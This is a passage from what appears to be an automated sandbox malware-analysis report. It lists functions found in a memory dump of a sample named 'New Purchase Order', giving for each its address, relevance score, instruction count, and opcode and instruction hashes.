                          Function 011F8B28 Relevance: .2, Instructions: 152COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4183b526c0f9a6e741caf1728b8f39b676c2fa642614f47602c152936853abe
                          • Instruction ID: ff317b30a28cefacab6579952d48e102c05b2428c0b1f71af136c3a45754efda
                          • Opcode Fuzzy Hash: a4183b526c0f9a6e741caf1728b8f39b676c2fa642614f47602c152936853abe
                          • Instruction Fuzzy Hash: 1C41E6717016159BD72DDB2DC895B7FBB9AEF90620F08821DEB598B2C1DB34D802C791
                          Function 011BCBF0 Relevance: .1, Instructions: 148COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aee4624c782c81ef2871fca96cb0c235844f709dc59d3d5407e1cc033449d03c
                          • Instruction ID: 1b4d6952c04669ed1b6d1f24d42276efda12ac0e94a1074037ca0378fb944951
                          • Opcode Fuzzy Hash: aee4624c782c81ef2871fca96cb0c235844f709dc59d3d5407e1cc033449d03c
                          • Instruction Fuzzy Hash: B4519D76A00216DFCB38DFA9D8C0AAEBBBAFB98758B114519D905A7704D734AD01CBD0
                          Function 011FA9D3 Relevance: .1, Instructions: 139COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                          • Instruction ID: 67ed3391f92b028e5b18094677fb9ba5ea22646c7eb5e2a04e71f733019a9802
                          • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                          • Instruction Fuzzy Hash: C3411A316047169FC72DCF28D884A6AB7A9FF80214B05462EEB5A87240EB35FC1CCBD1
                          Function 011601F8 Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6abca7d92831fce80d757ffd80126dbc4322e27bdf851ff1e2aefe6ff606b067
                          • Instruction ID: cfe244c3742e32a430ca5fac91ed29623715c1c204a0a23ba7c41292586d8379
                          • Opcode Fuzzy Hash: 6abca7d92831fce80d757ffd80126dbc4322e27bdf851ff1e2aefe6ff606b067
                          • Instruction Fuzzy Hash: 5241CB369002199BDB18DF98C440AEEBBB8BF8C704F15816EF815E7240E7369C51CBA5
                          Function 0115EBFC Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c228cc1c0115daec8c02a6919bb499e0de0aa2ae1ae00589be0e11966e52f4c5
                          • Instruction ID: d73380bebf67d7ef65876f8911de8a462ad03d52653395138d4e9238cec45e72
                          • Opcode Fuzzy Hash: c228cc1c0115daec8c02a6919bb499e0de0aa2ae1ae00589be0e11966e52f4c5
                          • Instruction Fuzzy Hash: 8C41F571604302DFDB6CDF28C884A6BBBE5FF84228F014829E967C7611DB31E945CB51
                          Function 01172750 Relevance: .1, Instructions: 137COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                          • Instruction ID: 84d7d7422ca3ba9dc9d66802654a87e2bf174d411d50a5384e58f38edd667e2e
                          • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                          • Instruction Fuzzy Hash: 39515B79E00615CFDB19CF98C580AAEFBB2FF84710F6881A9D915A7351D770AE42CB90
                          Function 01136154 Relevance: .1, Instructions: 133COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 719b12ff532faf758e23de671b34754e87d80f6ebd356093b210e7bbf239d1ad
                          • Instruction ID: ab8133f0de5ee75db73ae113138576c7420fc7120aaab182cc19633cf16f0257
                          • Opcode Fuzzy Hash: 719b12ff532faf758e23de671b34754e87d80f6ebd356093b210e7bbf239d1ad
                          • Instruction Fuzzy Hash: 0C512670900256EBDB3DCB28CC04BA8BBB5FF55318F1582A9E529A72C5D7749A81CF81
                          Function 01130BCD Relevance: .1, Instructions: 130COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 834d9ef87a74a95c37cb098072dbce0b47fc09773b6e60ad35d3d391e3ed0b6b
                          • Instruction ID: 917da5e5ad35a151a0593cd73f87245ca78e2e8daec4c415039adf0fb6985140
                          • Opcode Fuzzy Hash: 834d9ef87a74a95c37cb098072dbce0b47fc09773b6e60ad35d3d391e3ed0b6b
                          • Instruction Fuzzy Hash: B2419F31A01229DBDB29EF68C940BEE77B8EF89750F0141A5E908AB241D7749E84CF95
                          Function 011F866E Relevance: .1, Instructions: 129COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                          • Instruction ID: a7164a89cadaf7696acb4d36d2c46b9db2fa93cbcf4eba75833f043f68a057ab
                          • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                          • Instruction Fuzzy Hash: 1A419676B10205ABDB1DDF99CC95AAFBBBAAF88614F14406DEA04A7341D770DD01C760
                          Function 01130887 Relevance: .1, Instructions: 128COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebbb03295f7c5696c1e2d40536f9de949bd8b041d068cfac1070710dd5084090
                          • Instruction ID: 49fa300ff1b1713d6ebbedaa6a65a69b4b185d76b3eed44787a9864cc25c44ce
                          • Opcode Fuzzy Hash: ebbb03295f7c5696c1e2d40536f9de949bd8b041d068cfac1070710dd5084090
                          • Instruction Fuzzy Hash: E141A171600702DFE72DDF28D490A26BBF9FF89318B148A6DE55A87A54E730E845CB90
                          Function 0115A470 Relevance: .1, Instructions: 127COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba77ec3a6c56a0013c96694177b5957e47ed1f275b6ec2c4da5e9df64517c977
                          • Instruction ID: 47d730299c58da0320cb333bb1eb5ec576350262bb0da5152b672e653ae05f71
                          • Opcode Fuzzy Hash: ba77ec3a6c56a0013c96694177b5957e47ed1f275b6ec2c4da5e9df64517c977
                          • Instruction Fuzzy Hash: 9241FF32980215DFDF6DEF68E498BAD7BB0FF58318F550265D921AB281DB309940CFA1
                          Function 01138BF0 Relevance: .1, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37744d8c762d7abaebd940e5e1e72307a91e713b1b8c5a964e84fed6b201c2db
                          • Instruction ID: 806e7546c4daf0a61977621b19ad2bb1832b24a5a82d938ebb957366d1a86760
                          • Opcode Fuzzy Hash: 37744d8c762d7abaebd940e5e1e72307a91e713b1b8c5a964e84fed6b201c2db
                          • Instruction Fuzzy Hash: 17413771900242EBDB3CEF48D844A9EBBB1FFD4708F158229E9015B259C739D942CF90
                          Function 01128918 Relevance: .1, Instructions: 123COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9fe7a3234d27f00f232c0bd8a6962af445ba448ecdc705b25069508478c17cb
                          • Instruction ID: 52710648e619c13548f1b7962af56edd1d6a284175a0ea05db50eedde4e6b116
                          • Opcode Fuzzy Hash: f9fe7a3234d27f00f232c0bd8a6962af445ba448ecdc705b25069508478c17cb
                          • Instruction Fuzzy Hash: 9741BE326087129ED716EF28C840B6BF7E9EF88B54F40092AF990D7250E730DE148B97
                          Function 0112A020 Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                          • Instruction ID: 12e8ecd47a3a668c3bfa58b3c8b8d7db5352bc4744372a7c0be9e7e4b7f28be5
                          • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                          • Instruction Fuzzy Hash: B4416C31A08221DBDB2DEE1894507BEBB72EF50754F16C06AEA408B640D73A9D50CF9A
                          Function 011309AD Relevance: .1, Instructions: 122COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ae20f2c9458317fd24ce84169921990b8e02d5dceb75b52a7cd2491b8cd8773e
                          • Instruction ID: 05a6725b82dc4700cf4ed27efb58be2d7ac3529c8bb49cbf8d72f22e7b67f571
                          • Opcode Fuzzy Hash: ae20f2c9458317fd24ce84169921990b8e02d5dceb75b52a7cd2491b8cd8773e
                          • Instruction Fuzzy Hash: 2F419871A00301EFD729DF18D840B26BBF5FF98718F208A6AE449CB255E730E942CB91
                          Function 01160710 Relevance: .1, Instructions: 121COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                          • Instruction ID: 539e3d10a58dba9e984d15748e645295de1637fb096469a3a43580170a82c200
                          • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                          • Instruction Fuzzy Hash: 6F415E71A00705EFDB28CF98C990AAABBF8FF18700B11496DE596D7250D331EA54CF50
                          Function 0113262C Relevance: .1, Instructions: 119COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3f5302337c252349b5576089c7f4608f1202ca12ce858a3fded4ebd26054423b
                          • Instruction ID: 56289fdfc9f155b99346c05a250b49ce35ccd3d25ce4dc2dbfbd097ab72c15f5
                          • Opcode Fuzzy Hash: 3f5302337c252349b5576089c7f4608f1202ca12ce858a3fded4ebd26054423b
                          • Instruction Fuzzy Hash: 1241E2B1901B11DFCB2EFF28D900B69B7B1FF94314F1182A9C8169B2A5DB309941CF52
                          Function 0116C8F9 Relevance: .1, Instructions: 116COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aef15349b4e008c10e376797904e65658bbaabdaabc40ed73168c45c56776a67
                          • Instruction ID: bf9acf56fe804836c942826d6cba8845888ff5a25d4be7bffddcec362e48a057
                          • Opcode Fuzzy Hash: aef15349b4e008c10e376797904e65658bbaabdaabc40ed73168c45c56776a67
                          • Instruction Fuzzy Hash: 81319CB1A00355DFDB1ADF98C440799BBF4FB09728F2081AED119EB291E3369902CF90
                          Function 011B07C3 Relevance: .1, Instructions: 114COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2f281f9478520fe3b8f1b2e48bf2fb2b5ce25bf89d9a075aaeb5ed12080e2613
                          • Instruction ID: f57d37f65df2341e970533bb9b8bf7be536959cc8140dd8312ce40e2dedf26f1
                          • Opcode Fuzzy Hash: 2f281f9478520fe3b8f1b2e48bf2fb2b5ce25bf89d9a075aaeb5ed12080e2613
                          • Instruction Fuzzy Hash: 14419072908345AFD724DF29C844B9BFBE8FF88614F004A2EF998C7250D7709904CB92
                          Function 011280A0 Relevance: .1, Instructions: 111COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0d6e6825b43f9fdb47b14af086f03071f748648bae06cafb8cf1efde600cccdb
                          • Instruction ID: de70f8fc919f8f7e11726ee0bb10f9c49e214eb4dc017f86fb84cc558f4e15ff
                          • Opcode Fuzzy Hash: 0d6e6825b43f9fdb47b14af086f03071f748648bae06cafb8cf1efde600cccdb
                          • Instruction Fuzzy Hash: 6941EF71A04626AFDB0DEF18C880AA8B7F1FF44764F258229D815A72C0DB34ED618B90
                          Function 011B05A7 Relevance: .1, Instructions: 111COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ed07132d4162b16e2bdd0aee93d6dd6d011c6121fb73c1813bafd7a176c91219
                          • Instruction ID: d2568730e3af4396dee1f4e5403b4b08774dee9014296a7fffae3f687607990f
                          • Opcode Fuzzy Hash: ed07132d4162b16e2bdd0aee93d6dd6d011c6121fb73c1813bafd7a176c91219
                          • Instruction Fuzzy Hash: 9741C0726047429FD329DF68C880AABB7F9BFC8700F14062DF99497690E730E904C7A6
                          Function 01134859 Relevance: .1, Instructions: 111COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b133844cf2e3f1a9ae712bff4417072819af06d3939e8c55b08a6cfb5f0f3b4
                          • Instruction ID: 6c9b5138bba9e4e286ef6a1e743271b6bb905a95c335f1dc2bb733a5be577431
                          • Opcode Fuzzy Hash: 9b133844cf2e3f1a9ae712bff4417072819af06d3939e8c55b08a6cfb5f0f3b4
                          • Instruction Fuzzy Hash: 3641D3312043028FD72DDF28D884B2ABBEAEFC4764F14446DEA558B695EB34D941CB91
                          Function 01128B50 Relevance: .1, Instructions: 111COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1cff975d771cab24210777eca2272c5142f6b244afe0e324dc2e85adf1148ec5
                          • Instruction ID: 12611fd8e0e17d9e04ef70e4de9538ce3eaca07d3fde7eb5b802dde092688c5f
                          • Opcode Fuzzy Hash: 1cff975d771cab24210777eca2272c5142f6b244afe0e324dc2e85adf1148ec5
                          • Instruction Fuzzy Hash: 9C41BD71A01625CFCB1DDF69C9809DDBBF1FF88324B20862ED466A72A0DB34A911CF40
                          Function 011402E1 Relevance: .1, Instructions: 106COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                          • Instruction ID: 4777f01e577917df6d43b0be1c339e7f9b2f835062054f89db0657a8a4764f16
                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                          • Instruction Fuzzy Hash: D3314632A08244AFDB2ACB69CC40BDBBFE8EF18710F0481A5F815D7352C3749880CBA1
                          Function 011DE3DB Relevance: .1, Instructions: 105COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8ce8e80040822b38c75f84bbc7c840f458690f92370e9d4773abc7faf5dc47e0
                          • Instruction ID: 7acdaa3d8f565fcfdee63e70364d45c6a212e0c56d86302247840820e35ba102
                          • Opcode Fuzzy Hash: 8ce8e80040822b38c75f84bbc7c840f458690f92370e9d4773abc7faf5dc47e0
                          • Instruction Fuzzy Hash: 8431B931751716ABDB3A9F558C41FAF76B9AB58B54F010028FA04EF391DBA4DC01C7A1
                          Function 011E4B4B Relevance: .1, Instructions: 104COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bad7d17df89d254cd9c3ac1396e7e16a722f4427fab1b456c6ce562c0e8da324
                          • Instruction ID: 5f48da9a9e2ad92721a5df9c25644536839d2dcc36d87732c5028c4e30f4dc28
                          • Opcode Fuzzy Hash: bad7d17df89d254cd9c3ac1396e7e16a722f4427fab1b456c6ce562c0e8da324
                          • Instruction Fuzzy Hash: 5331F2322056019FC739DF5DE888E2AB7E6FB85360F0A446EE995CBA51D730E850CF81
                          Function 01134260 Relevance: .1, Instructions: 102COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6049d71fbfd9cb4a0edebaa802866ddff2ed4783dff60694259a6f60a061bf95
                          • Instruction ID: 4833925faaa3965418aefe9c74383bf177ca979b3b5d6f9130e4e24fdf39cc4c
                          • Opcode Fuzzy Hash: 6049d71fbfd9cb4a0edebaa802866ddff2ed4783dff60694259a6f60a061bf95
                          • Instruction Fuzzy Hash: 4541BF31204B45DFDB2ACF28C880BE67BE9BF49714F018469FAA98B650C774E800CB50
                          Function 011E4BB0 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62fcdf4d901ef74dddc58517fa5668a4925ff3cc05b6a5ac8457b6a0683f28c3
                          • Instruction ID: 568777346d2209e9c15e5946fbc9dd8e9e95df2fdf5b75cd342966a80898120d
                          • Opcode Fuzzy Hash: 62fcdf4d901ef74dddc58517fa5668a4925ff3cc05b6a5ac8457b6a0683f28c3
                          • Instruction Fuzzy Hash: 5C31CF712046019FD328DF68D888A2AB7E5FB84724F05456DF955CBB90E730EC50CB91
                          Function 011AEB1D Relevance: .1, Instructions: 100COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7b3b057a880652e4440507bb9d5ecbf581bc7900406680cdac7f7a9c77f5c27c
                          • Instruction ID: babf0089cdca936de6b29a07ff37a7949125fb6560d3ec0bad09ea8e81be05cb
                          • Opcode Fuzzy Hash: 7b3b057a880652e4440507bb9d5ecbf581bc7900406680cdac7f7a9c77f5c27c
                          • Instruction Fuzzy Hash: BF31D5353426929BF32E576CCD5CB697FD8BB44B44F9D00A0EB869B6D2DB28D840C231
                          Function 011F61C3 Relevance: .1, Instructions: 97COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7567b2c8a822fe1974673d10a5890e9201765a41bc255fcde1d745a0c85f0b69
                          • Instruction ID: 4b8b8f8910128e2b1bbff086bf3e701c43cafdd240286fe0c4fccaf70f853817
                          • Opcode Fuzzy Hash: 7567b2c8a822fe1974673d10a5890e9201765a41bc255fcde1d745a0c85f0b69
                          • Instruction Fuzzy Hash: E031D57AA00216EBDB19DF98CC40FAEB7B5FB44B44F454169EA00EB244D770ED01CB94
                          Function 011D483A Relevance: .1, Instructions: 96COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2a45c3f3c451f545f5789146a7044238f9a7b6b295b09011d665cfe1dda8a278
                          • Instruction ID: 3c16c5bde87afb630e68d3d517b441ed114e72b2034f01895a54b7a7247eaf48
                          • Opcode Fuzzy Hash: 2a45c3f3c451f545f5789146a7044238f9a7b6b295b09011d665cfe1dda8a278
                          • Instruction Fuzzy Hash: 2C318336A4012DABCF25DF55DC84BDEBBBAAB9C310F1000A5E508A7650DB30DE91CF90
                          Function 0115EB20 Relevance: .1, Instructions: 96COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4902f6bb976e0e6f44a56c5e7fd81b97f2bbabf191d5a73e0912c0e1a01b29e9
                          • Instruction ID: 51c785ed2849feceee3fb27c7cc7af88010a55ed542e662a7f144f6d26d740f7
                          • Opcode Fuzzy Hash: 4902f6bb976e0e6f44a56c5e7fd81b97f2bbabf191d5a73e0912c0e1a01b29e9
                          • Instruction Fuzzy Hash: 8731A472E01219EFDB79DEA9C840AAEFBF9EF44750F014426E925E7250D3709B018BA1
                          Function 011F60B8 Relevance: .1, Instructions: 95COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6f9258dbee7d64d09963a216f1aa0ef1fdfb180f7836f7411a59b520d3bb72b3
                          • Instruction ID: d042c4867d6a98cb0000f8668b6fd05036d025e0de311a8bc6ca62694ded78bd
                          • Opcode Fuzzy Hash: 6f9258dbee7d64d09963a216f1aa0ef1fdfb180f7836f7411a59b520d3bb72b3
                          • Instruction Fuzzy Hash: F031C271B04616ABDB2AEFA9C850B6EBBB9EB84758F11006DE605DB341DB30DC00CB90
                          Function 011307AF Relevance: .1, Instructions: 95COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3001334d255686a5ee9fb867f372cc350476e16db8d3f9b2e918b6e050a293d3
                          • Instruction ID: d712c03e447e6331c1c46b6560002ba7a111da3e67f140d2b3e31ecdab164c11
                          • Opcode Fuzzy Hash: 3001334d255686a5ee9fb867f372cc350476e16db8d3f9b2e918b6e050a293d3
                          • Instruction Fuzzy Hash: 8F31C532E05612DBC71EDE288880A6BBBE5AFD8664F02456DFD55A7318DB30DC1187E2
                          Function 01138550 Relevance: .1, Instructions: 94COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
